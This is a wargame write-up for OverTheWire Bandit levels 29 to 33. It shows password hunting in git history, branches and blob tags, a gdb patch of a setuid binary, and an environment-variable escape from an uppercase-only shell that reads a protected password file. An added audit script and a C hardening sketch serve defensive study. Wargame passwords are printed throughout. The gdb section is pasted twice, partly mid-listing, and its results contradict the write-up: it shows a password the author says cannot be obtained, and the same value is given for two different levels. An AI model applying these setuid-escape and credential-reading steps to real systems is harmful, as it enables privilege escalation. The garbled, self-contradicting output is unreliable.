@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
## credentials
- username: bandit29
-- password: <TBD>
+- password: bbc96594b4e001778eee9975372716b2
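Review bot: the `+- password:` line in README.md commits a live credential in plaintext in place of the `<TBD>` placeholder. Keep the placeholder in the tracked file and deliver the value out of band (a secrets store or an untracked file), since anything committed here stays retrievable from the history.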
Level 29 -> Level 30
This level is very similar to the previous two; the difference now is that the correct password is in the dev branch.
bandit29@bandit:~$ mkdir /tmp/repository2
bandit29@bandit:~$ cd /tmp/repository2
bandit29@bandit:/tmp/repository2$ git clone ssh://bandit29-git@localhost/home/bandit29-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit29/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit29/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit29-git@localhost's password:
remote: Counting objects: 16, done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 16 (delta 2), reused 0 (delta 0)
Receiving objects: 100% (16/16), done.
Resolving deltas: 100% (2/2), done.
Checking connectivity... done.
bandit29@bandit:/tmp/repository2$ cd repo
bandit29@bandit:/tmp/repository2/repo$ git show-branch -a
* [master] fix username
! [origin/HEAD] fix username
! [origin/dev] add data needed for development
! [origin/master] fix username
! [origin/sploits-dev] add some silly exploit, just for shit and giggles
-----
+ [origin/sploits-dev] add some silly exploit, just for shit and giggles
+ [origin/dev] add data needed for development
+ [origin/dev^] add gif2ascii
*++++ [master] fix username
bandit29@bandit:/tmp/repository2/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/dev
remotes/origin/master
remotes/origin/sploits-dev
bandit29@bandit:/tmp/repository2/repo$ git checkout remotes/origin/dev
Previous HEAD position was d59303d... add some silly exploit, just for shit and giggles
HEAD is now at 77ec80e... add data needed for development
bandit29@bandit:/tmp/repository2/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit30
- password: 5b90576bedb2cc04c86a9e924ce42faf
Level 30 -> Level 31
Similar to the previous levels. This time there is a tag named "secret", but when we try to check it out the checkout fails (git reports that the reference is not a tree). If we look at the contents of .git/packed-refs we can see the hash that secret points to; checking its type with git cat-file -t shows that it is a blob, and we can print its contents with git cat-file -p.
bandit30@bandit:~$ mkdir /tmp/repository3
bandit30@bandit:~$ cd /tmp/repository3
bandit30@bandit:/tmp/repository3$ git clone ssh://bandit30-git@localhost/home/bandit30-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit30/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit30/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit30-git@localhost's password:
remote: Counting objects: 4, done.
remote: Total 4 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (4/4), done.
Checking connectivity... done.
bandit30@bandit:/tmp/repository3$ cd repo/
bandit30@bandit:/tmp/repository3/repo$ cat README.md
just an epmty file... muahaha
bandit30@bandit:/tmp/repository3/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/master
bandit30@bandit:/tmp/repository3/repo$ git tag
secret
bandit30@bandit:/tmp/repository3/repo$ git checkout tags/secret
fatal: reference is not a tree: tags/secret
bandit30@bandit:/tmp/repository3/repo$ cat .git/packed-refs
# pack-refs with: peeled fully-peeled
1791c9d4a559bffa4e6e89c15f7723167da10bb8 refs/remotes/origin/master
f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea refs/tags/secret
bandit30@bandit:/tmp/repository3/repo$ git cat-file -t f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea
blob
bandit30@bandit:/tmp/repository3/repo$ git cat-file -p f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea
47e603bb428404d265f59c42920d81e5
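The check above, generalized into a small audit (an added example, not part of the original write-up): it parses .git/packed-refs and loose refs, reads each target's object type as git cat-file -t would report it, and flags refs that point at something other than a commit (or, under refs/tags/, an annotated tag). All function names and the constructed sample repository are assumptions for illustration; objects that are not stored loose are typed by calling git cat-file -t when git is on the PATH.

```python
import hashlib
import os
import re
import shutil
import subprocess
import tempfile
import zlib

SHA1_RE = re.compile(r"^[0-9a-f]{40}$")


def parse_packed_refs(text):
    """Return {refname: sha} from the contents of .git/packed-refs."""
    refs = {}
    for line in text.splitlines():
        line = line.strip()
        # '#' is the header line, '^' carries the peeled value of an annotated tag.
        if not line or line[0] in "#^":
            continue
        sha, _, name = line.partition(" ")
        if SHA1_RE.match(sha) and name:
            refs[name] = sha
    return refs


def collect_refs(git_dir):
    """Merge packed refs with loose refs (loose files take precedence)."""
    refs = {}
    packed = os.path.join(git_dir, "packed-refs")
    if os.path.isfile(packed):
        with open(packed) as fh:
            refs.update(parse_packed_refs(fh.read()))
    for dirpath, _, files in os.walk(os.path.join(git_dir, "refs")):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path) as fh:
                value = fh.read().strip()
            if SHA1_RE.match(value):  # skips symbolic refs ("ref: refs/...")
                refs[os.path.relpath(path, git_dir).replace(os.sep, "/")] = value
    return refs


def read_loose(git_dir, sha):
    """Return (type, body) of a loose object, or None if it is not loose."""
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    if not os.path.isfile(path):
        return None
    with open(path, "rb") as fh:
        raw = zlib.decompress(fh.read())
    header, _, body = raw.partition(b"\0")  # header is "<type> <size>"
    return header.split(b" ")[0].decode(), body


def object_type(git_dir, sha):
    loose = read_loose(git_dir, sha)
    if loose:
        return loose[0]
    if shutil.which("git"):  # packed objects: let git answer
        out = subprocess.run(["git", "--git-dir", git_dir, "cat-file", "-t", sha],
                             capture_output=True, text=True)
        if out.returncode == 0:
            return out.stdout.strip()
    return "unknown"


def audit(git_dir):
    """List (ref, sha, type) for refs whose target is not what the ref kind implies."""
    findings = []
    for name, sha in sorted(collect_refs(git_dir).items()):
        allowed = ("commit", "tag") if name.startswith("refs/tags/") else ("commit",)
        kind = object_type(git_dir, sha)
        if kind not in allowed:  # includes "unknown": could not be verified
            findings.append((name, sha, kind))
    return findings


def write_loose(git_dir, kind, body):
    """Store a loose object the way git does: zlib("<type> <size>\\0<body>")."""
    store = kind.encode() + b" " + str(len(body)).encode() + b"\0" + body
    sha = hashlib.sha1(store).hexdigest()
    os.makedirs(os.path.join(git_dir, "objects", sha[:2]), exist_ok=True)
    with open(os.path.join(git_dir, "objects", sha[:2], sha[2:]), "wb") as fh:
        fh.write(zlib.compress(store))
    return sha


def build_sample(root):
    """Constructed sample: one branch ref on a commit, one tag ref on a blob."""
    git_dir = os.path.join(root, ".git")
    os.makedirs(os.path.join(git_dir, "refs"))
    commit = write_loose(git_dir, "commit", b"constructed commit body\n")
    blob = write_loose(git_dir, "blob", b"constructed-secret-value\n")
    with open(os.path.join(git_dir, "packed-refs"), "w") as fh:
        fh.write("# pack-refs with: peeled fully-peeled \n")
        fh.write(f"{commit} refs/remotes/origin/master\n")
        fh.write(f"{blob} refs/tags/secret\n")
    return git_dir, blob


def demo():
    with tempfile.TemporaryDirectory() as root:
        git_dir, blob = build_sample(root)
        return audit(git_dir), read_loose(git_dir, blob)


if __name__ == "__main__":
    for name, sha, kind in demo()[0]:
        print(f"{name} -> {sha} ({kind})")
```

Run against a real clone by passing its .git directory to audit(); a tag that resolves to a blob or tree never shows up in git log or a checkout, which is why it is worth listing explicitly.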
Level 31 -> Level 32
Similar to the previous levels. In this case all we need to do is push to the remote server, but first we have to create a file with specific content. The problem is that this file's extension (.txt) is ignored by git because it is listed in .gitignore. To solve this level we delete the .gitignore file and then push.
bandit31@bandit:~$ mkdir /tmp/repository4
bandit31@bandit:~$ cd /tmp/repository4
bandit31@bandit:/tmp/repository4$ git clone ssh://bandit31-git@localhost/home/bandit31-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
remote: Counting objects: 4, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 4 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (4/4), done.
Checking connectivity... done.
bandit31@bandit:/tmp/repository4$ cd repo/
bandit31@bandit:/tmp/repository4/repo$ ls
README.md
bandit31@bandit:/tmp/repository4/repo$ cat README.md
This time your task is to push a file to the remote repository.
Details:
File name: key.txt
Content: 'May I come in?'
Branch: master
bandit31@bandit:/tmp/repository4/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/master
bandit31@bandit:/tmp/repository4/repo$ git tag
bandit31@bandit:/tmp/repository4/repo$ echo "May I come in?" >> key.txt
bandit31@bandit:/tmp/repository4/repo$ git add key.txt
The following paths are ignored by one of your .gitignore files:
key.txt
Use -f if you really want to add them.
bandit31@bandit:/tmp/repository4/repo$ cat .gitignore
*.txt
bandit31@bandit:/tmp/repository4/repo$ rm .gitignore
bandit31@bandit:/tmp/repository4/repo$ git add key.txt
bandit31@bandit:/tmp/repository4/repo$ git commit -m "commit"
[master 8a91364] commit
1 file changed, 1 insertion(+)
create mode 100644 key.txt
bandit31@bandit:/tmp/repository4/repo$ git push origin master
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
Counting objects: 3, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 315 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 56a9bf19c63d650ce78e6ec0354ee45e
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://bandit31-git@localhost/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'
Level 32 -> Level 33
This level is about getting around the restrictions of a binary with the setuid bit set. I used two approaches here: one based on reverse engineering, which was a bit of a wild tangent but which I am leaving in because it may be interesting, and another that is the correct way I came up with to solve the challenge.
The goal is to cat a file in /etc/bandit_pass that contains the password. To do that we have to use the setuid binary (as in other levels). The difference is that this binary gives you a shell where you can type commands, but they are converted to uppercase before being executed.
The first approach I tried was to use GDB to patch out (NOP, 0x90) the instructions that convert the entered command to uppercase. The problem with this approach is that when a program with the setuid bit is run under a debugger, the bit is automatically disabled, so it is not possible to obtain the password this way. I am leaving it in anyway because it may be interesting.
bandit32@bandit:~$ ls
uppershell
bandit32@bandit:~$ ll
total 28
drwxr-xr-x 2 root root 4096 Jul 22 18:59 ./
drwxr-xr-x 42 root root 4096 Jul 22 18:42 ../
-rw-r--r-- 1 root root 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 root root 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 root root 655 Jun 24 2016 .profile
-rwsr-x--- 1 bandit33 bandit32 7668 Jul 22 18:59 uppershell*
bandit32@bandit:~$ file uppershell
uppershell: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cdff8f7c7d0798f2f0b06721115c5dce7db6ed1e, not stripped
bandit32@bandit:~$ ./uppershell
WELCOME TO THE UPPERCASE SHELL
>> ls
sh: 1: LS: not found
>> ^C
bandit32@bandit:~$ gdb -q ./uppershell
Reading symbols from ./uppershell...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x80485c1
(gdb) run
Starting program: /home/bandit32/uppershell
Breakpoint 1, 0x080485c1 in main ()
(gdb) disassemble
Dump of assembler code for function main:
0x080485bd <+0>: push %ebp
0x080485be <+1>: mov %esp,%ebp
0x080485c0 <+3>: push %ebx
=> 0x080485c1 <+4>: and $0xfffffff0,%esp
0x080485c4 <+7>: sub $0x420,%esp
0x080485ca <+13>: mov 0xc(%ebp),%eax
0x080485cd <+16>: mov %eax,0xc(%esp)
0x080485d1 <+20>: mov %gs:0x14,%eax
0x080485d7 <+26>: mov %eax,0x41c(%esp)
0x080485de <+33>: xor %eax,%eax
0x080485e0 <+35>: call 0x8048440 <geteuid@plt>
0x080485e5 <+40>: mov %eax,%ebx
0x080485e7 <+42>: call 0x8048440 <geteuid@plt>
0x080485ec <+47>: mov %ebx,0x4(%esp)
0x080485f0 <+51>: mov %eax,(%esp)
0x080485f3 <+54>: call 0x8048480 <setreuid@plt>
0x080485f8 <+59>: movl $0x8048720,(%esp)
0x080485ff <+66>: call 0x8048450 <puts@plt>
0x08048604 <+71>: movl $0x804873f,(%esp)
0x0804860b <+78>: call 0x8048410 <printf@plt>
0x08048610 <+83>: movl $0x0,(%esp)
0x08048617 <+90>: call 0x8048420 <fflush@plt>
0x0804861c <+95>: mov 0x804a040,%eax
0x08048621 <+100>: mov %eax,0x8(%esp)
0x08048625 <+104>: movl $0x3ff,0x4(%esp)
0x0804862d <+112>: lea 0x1c(%esp),%eax
0x08048631 <+116>: mov %eax,(%esp)
0x08048634 <+119>: call 0x8048430 <fgets@plt>
0x08048639 <+124>: test %eax,%eax
0x0804863b <+126>: jne 0x8048649 <main+140>
0x0804863d <+128>: movl $0x1,(%esp)
0x08048644 <+135>: call 0x8048470 <exit@plt>
0x08048649 <+140>: movl $0x0,0x18(%esp)
0x08048651 <+148>: jmp 0x804867c <main+191>
0x08048653 <+150>: lea 0x1c(%esp),%edx
0x08048657 <+154>: mov 0x18(%esp),%eax
0x0804865b <+158>: add %edx,%eax
---Type <return> to continue, or q <return> to quit---
0x0804865d <+160>: movzbl (%eax),%eax
0x08048660 <+163>: movsbl %al,%eax
0x08048663 <+166>: mov %eax,(%esp)
0x08048666 <+169>: call 0x80484a0 <toupper@plt>
0x0804866b <+174>: lea 0x1c(%esp),%ecx
0x0804866f <+178>: mov 0x18(%esp),%edx
0x08048673 <+182>: add %ecx,%edx
0x08048675 <+184>: mov %al,(%edx)
0x08048677 <+186>: addl $0x1,0x18(%esp)
0x0804867c <+191>: lea 0x1c(%esp),%edx
0x08048680 <+195>: mov 0x18(%esp),%eax
0x08048684 <+199>: add %edx,%eax
0x08048686 <+201>: movzbl (%eax),%eax
0x08048689 <+204>: test %al,%al
0x0804868b <+206>: jne 0x8048653 <main+150>
0x0804868d <+208>: lea 0x1c(%esp),%eax
0x08048691 <+212>: mov %eax,(%esp)
0x08048694 <+215>: call 0x8048460 <system@plt>
0x08048699 <+220>: jmp 0x8048604 <main+71>
End of assembler dump.
(gdb) set *(char*)0x08048666 = 0x90
(gdb) set *(char*)0x08048667 = 0x90
(gdb) set *(char*)0x08048668 = 0x90
(gdb) set *(char*)0x08048669 = 0x90
(gdb) set *(char*)0x0804866a = 0x90
(gdb) disassemble
Dump of assembler code for function main:
0x080485bd <+0>: push %ebp
0x080485be <+1>: mov %esp,%ebp
0x080485c0 <+3>: push %ebx
=> 0x080485c1 <+4>: and $0xfffffff0,%esp
0x080485c4 <+7>: sub $0x420,%esp
0x080485ca <+13>: mov 0xc(%ebp),%eax
0x080485cd <+16>: mov %eax,0xc(%esp)
0x080485d1 <+20>: mov %gs:0x14,%eax
0x080485d7 <+26>: mov %eax,0x41c(%esp)
0x080485de <+33>: xor %eax,%eax
0x080485e0 <+35>: call 0x8048440 <geteuid@plt>
0x080485e5 <+40>: mov %eax,%ebx
0x080485e7 <+42>: call 0x8048440 <geteuid@plt>
0x080485ec <+47>: mov %ebx,0x4(%esp)
0x080485f0 <+51>: mov %eax,(%esp)
0x080485f3 <+54>: call 0x8048480 <setreuid@plt>
0x080485f8 <+59>: movl $0x8048720,(%esp)
0x080485ff <+66>: call 0x8048450 <puts@plt>
0x08048604 <+71>: movl $0x804873f,(%esp)
0x0804860b <+78>: call 0x8048410 <printf@plt>
0x08048610 <+83>: movl $0x0,(%esp)
0x08048617 <+90>: call 0x8048420 <fflush@plt>
0x0804861c <+95>: mov 0x804a040,%eax
0x08048621 <+100>: mov %eax,0x8(%esp)
0x08048625 <+104>: movl $0x3ff,0x4(%esp)
0x0804862d <+112>: lea 0x1c(%esp),%eax
0x08048631 <+116>: mov %eax,(%esp)
0x08048634 <+119>: call 0x8048430 <fgets@plt>
0x08048639 <+124>: test %eax,%eax
0x0804863b <+126>: jne 0x8048649 <main+140>
0x0804863d <+128>: movl $0x1,(%esp)
0x08048644 <+135>: call 0x8048470 <exit@plt>
0x08048649 <+140>: movl $0x0,0x18(%esp)
0x08048651 <+148>: jmp 0x804867c <main+191>
0x08048653 <+150>: lea 0x1c(%esp),%edx
0x08048657 <+154>: mov 0x18(%esp),%eax
0x0804865b <+158>: add %edx,%eax
---Type <return> to continue, or q <return> to quit---
0x0804865d <+160>: movzbl (%eax),%eax
0x08048660 <+163>: movsbl %al,%eax
0x08048663 <+166>: mov %eax,(%esp)
0x08048666 <+169>: nop
0x08048667 <+170>: nop
0x08048668 <+171>: nop
0x08048669 <+172>: nop
0x0804866a <+173>: nop
0x0804866b <+174>: lea 0x1c(%esp),%ecx
0x0804866f <+178>: mov 0x18(%esp),%edx
0x08048673 <+182>: add %ecx,%edx
0x08048675 <+184>: mov %al,(%edx)
0x08048677 <+186>: addl $0x1,0x18(%esp)
0x0804867c <+191>: lea 0x1c(%esp),%edx
0x08048680 <+195>: mov 0x18(%esp),%eax
0x08048684 <+199>: add %edx,%eax
0x08048686 <+201>: movzbl (%eax),%eax
0x08048689 <+204>: test %al,%al
0x0804868b <+206>: jne 0x8048653 <main+150>
0x0804868d <+208>: lea 0x1c(%esp),%eax
0x08048691 <+212>: mov %eax,(%esp)
0x08048694 <+215>: call 0x8048460 <system@plt>
0x08048699 <+220>: jmp 0x8048604 <main+71>
End of assembler dump.
(gdb) c
Continuing.
WELCOME TO THE UPPERCASE SHELL
>> ls
uppershell
>> cat /etc/bandit_pass/bandit33
56a9bf19c63d650ce78e6ec0354ee45e
0x08048639 <+124>: test %eax,%eax
0x0804863b <+126>: jne 0x8048649 <main+140>
0x0804863d <+128>: movl $0x1,(%esp)
0x08048644 <+135>: call 0x8048470 <exit@plt>
0x08048649 <+140>: movl $0x0,0x18(%esp)
0x08048651 <+148>: jmp 0x804867c <main+191>
0x08048653 <+150>: lea 0x1c(%esp),%edx
0x08048657 <+154>: mov 0x18(%esp),%eax
0x0804865b <+158>: add %edx,%eax
---Type <return> to continue, or q <return> to quit---
0x0804865d <+160>: movzbl (%eax),%eax
0x08048660 <+163>: movsbl %al,%eax
0x08048663 <+166>: mov %eax,(%esp)
0x08048666 <+169>: call 0x80484a0 <toupper@plt>
0x0804866b <+174>: lea 0x1c(%esp),%ecx
0x0804866f <+178>: mov 0x18(%esp),%edx
0x08048673 <+182>: add %ecx,%edx
0x08048675 <+184>: mov %al,(%edx)
0x08048677 <+186>: addl $0x1,0x18(%esp)
0x0804867c <+191>: lea 0x1c(%esp),%edx
0x08048680 <+195>: mov 0x18(%esp),%eax
0x08048684 <+199>: add %edx,%eax
0x08048686 <+201>: movzbl (%eax),%eax
0x08048689 <+204>: test %al,%al
0x0804868b <+206>: jne 0x8048653 <main+150>
0x0804868d <+208>: lea 0x1c(%esp),%eax
0x08048691 <+212>: mov %eax,(%esp)
0x08048694 <+215>: call 0x8048460 <system@plt>
0x08048699 <+220>: jmp 0x8048604 <main+71>
End of assembler dump.
(gdb) set *(char*)0x08048666 = 0x90
(gdb) set *(char*)0x08048667 = 0x90
(gdb) set *(char*)0x08048668 = 0x90
(gdb) set *(char*)0x08048669 = 0x90
(gdb) set *(char*)0x0804866a = 0x90
(gdb) disassemble
Dump of assembler code for function main:
0x080485bd <+0>: push %ebp
0x080485be <+1>: mov %esp,%ebp
0x080485c0 <+3>: push %ebx
=> 0x080485c1 <+4>: and $0xfffffff0,%esp
0x080485c4 <+7>: sub $0x420,%esp
0x080485ca <+13>: mov 0xc(%ebp),%eax
0x080485cd <+16>: mov %eax,0xc(%esp)
0x080485d1 <+20>: mov %gs:0x14,%eax
0x080485d7 <+26>: mov %eax,0x41c(%esp)
0x080485de <+33>: xor %eax,%eax
0x080485e0 <+35>: call 0x8048440 <geteuid@plt>
0x080485e5 <+40>: mov %eax,%ebx
0x080485e7 <+42>: call 0x8048440 <geteuid@plt>
0x080485ec <+47>: mov %ebx,0x4(%esp)
0x080485f0 <+51>: mov %eax,(%esp)
0x080485f3 <+54>: call 0x8048480 <setreuid@plt>
0x080485f8 <+59>: movl $0x8048720,(%esp)
0x080485ff <+66>: call 0x8048450 <puts@plt>
0x08048604 <+71>: movl $0x804873f,(%esp)
0x0804860b <+78>: call 0x8048410 <printf@plt>
0x08048610 <+83>: movl $0x0,(%esp)
0x08048617 <+90>: call 0x8048420 <fflush@plt>
0x0804861c <+95>: mov 0x804a040,%eax
0x08048621 <+100>: mov %eax,0x8(%esp)
0x08048625 <+104>: movl $0x3ff,0x4(%esp)
0x0804862d <+112>: lea 0x1c(%esp),%eax
0x08048631 <+116>: mov %eax,(%esp)
0x08048634 <+119>: call 0x8048430 <fgets@plt>
0x08048639 <+124>: test %eax,%eax
0x0804863b <+126>: jne 0x8048649 <main+140>
0x0804863d <+128>: movl $0x1,(%esp)
0x08048644 <+135>: call 0x8048470 <exit@plt>
0x08048649 <+140>: movl $0x0,0x18(%esp)
0x08048651 <+148>: jmp 0x804867c <main+191>
0x08048653 <+150>: lea 0x1c(%esp),%edx
0x08048657 <+154>: mov 0x18(%esp),%eax
0x0804865b <+158>: add %edx,%eax
---Type <return> to continue, or q <return> to quit---
0x0804865d <+160>: movzbl (%eax),%eax
0x08048660 <+163>: movsbl %al,%eax
0x08048663 <+166>: mov %eax,(%esp)
0x08048666 <+169>: nop
0x08048667 <+170>: nop
0x08048668 <+171>: nop
0x08048669 <+172>: nop
0x0804866a <+173>: nop
0x0804866b <+174>: lea 0x1c(%esp),%ecx
0x0804866f <+178>: mov 0x18(%esp),%edx
0x08048673 <+182>: add %ecx,%edx
0x08048675 <+184>: mov %al,(%edx)
0x08048677 <+186>: addl $0x1,0x18(%esp)
0x0804867c <+191>: lea 0x1c(%esp),%edx
0x08048680 <+195>: mov 0x18(%esp),%eax
0x08048684 <+199>: add %edx,%eax
0x08048686 <+201>: movzbl (%eax),%eax
0x08048689 <+204>: test %al,%al
0x0804868b <+206>: jne 0x8048653 <main+150>
0x0804868d <+208>: lea 0x1c(%esp),%eax
0x08048691 <+212>: mov %eax,(%esp)
0x08048694 <+215>: call 0x8048460 <system@plt>
0x08048699 <+220>: jmp 0x8048604 <main+71>
End of assembler dump.
(gdb) c
Continuing.
WELCOME TO THE UPPERCASE SHELL
>> ls
uppershell
>> cat /etc/bandit_pass/bandit33
56a9bf19c63d650ce78e6ec0354ee45e
The second approach is to store the command we want to run in an environment variable and then, inside the uppercase shell, reference that variable (which holds the command to execute). The variable name is already uppercase, so toupper() leaves it unchanged, and the sh started by system() expands it.
bandit32@bandit:~$ ls
uppershell
bandit32@bandit:~$ ll
total 28
drwxr-xr-x 2 root root 4096 Jul 22 18:59 ./
drwxr-xr-x 42 root root 4096 Jul 22 18:42 ../
-rw-r--r-- 1 root root 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 root root 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 root root 655 Jun 24 2016 .profile
-rwsr-x--- 1 bandit33 bandit32 7668 Jul 22 18:59 uppershell*
bandit32@bandit:~$ file uppershell
uppershell: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cdff8f7c7d0798f2f0b06721115c5dce7db6ed1e, not stripped
bandit32@bandit:~$ ./uppershell
WELCOME TO THE UPPERCASE SHELL
>> cat /etc/bandit_pass/bandit33
sh: 1: CAT: not found
bandit32@bandit:~$ ls
uppershell
bandit32@bandit:~$ COMMAND="cat /etc/bandit_pass/bandit33" ./uppershell
WELCOME TO THE UPPERCASE SHELL
>> $COMMAND
c9c3199ddf4121b10cf581a98d51caee
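The C sketch below is an added example, not code from the original write-up or from the wargame. It rebuilds the toupper() loop seen at main+150..main+206 to show why an uppercase filter in front of system() is not a sanitizer, next to a hardened form that never starts a shell. The names `run_via_shell` and `lookup_allowed`, the allow-listed verbs and the marker value are assumptions made for the illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same transformation as the loop at main+150..main+206: toupper() on every byte. */
static void upper_in_place(char *s) {
    for (size_t i = 0; s[i] != '\0'; i++)
        s[i] = (char)toupper((unsigned char)s[i]);
}

/* Weak pattern: the filtered line goes to "sh -c". popen() starts the shell the
 * same way system() does and lets us capture the first line of output.
 * Returns 0 if the command exited with status 0, -1 otherwise. */
int run_via_shell(const char *line, char *out, size_t outlen) {
    char buf[1024];
    snprintf(buf, sizeof buf, "%s", line);
    upper_in_place(buf);
    FILE *p = popen(buf, "r");
    if (p == NULL) return -1;
    if (fgets(out, (int)outlen, p) == NULL) out[0] = '\0';
    out[strcspn(out, "\n")] = '\0';
    return pclose(p) == 0 ? 0 : -1;
}

/* Hardened pattern: no shell. The line must match an allow-listed verb exactly;
 * returns its index (to be dispatched with execve and a fixed environment) or -1. */
int lookup_allowed(const char *line) {
    static const char *const allowed[] = { "DATE", "UPTIME" }; /* hypothetical verbs */
    char buf[1024];
    snprintf(buf, sizeof buf, "%s", line);
    buf[strcspn(buf, "\n")] = '\0';
    upper_in_place(buf);
    for (size_t i = 0; i < sizeof allowed / sizeof allowed[0]; i++)
        if (strcmp(buf, allowed[i]) == 0) return (int)i;
    return -1;
}

int main(void) {
    char out[128];
    setenv("COMMAND", "echo constructed-marker", 1); /* constructed, harmless value */
    int rc = run_via_shell("$COMMAND", out, sizeof out);
    printf("shell path: rc=%d out=%s\n", rc, out);   /* '$' and A-Z pass toupper() unchanged */
    printf("allow-list: $COMMAND -> %d, date -> %d\n",
           lookup_allowed("$COMMAND"), lookup_allowed("date"));
    return 0;
}
```

The same reasoning applies to any character-level filter placed in front of system(): the filter sees the literal text, while the shell acts on its expansion.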
Level 33 -> Level 34
Having reached this level, we have finished all the Bandit challenges!
bandit33@bandit:~$ ls
README.txt
bandit33@bandit:~$ cat README.txt
Congratulations on solving the last level of this game!
At this moment, there are no more levels to play in this game. However, we are constantly working
on new levels and will most likely expand this game with more levels soon.
Keep an eye out for an announcement on our usual communication channels!
In the meantime, you could play some of our other wargames.
If you have an idea for an awesome new level, please let us know!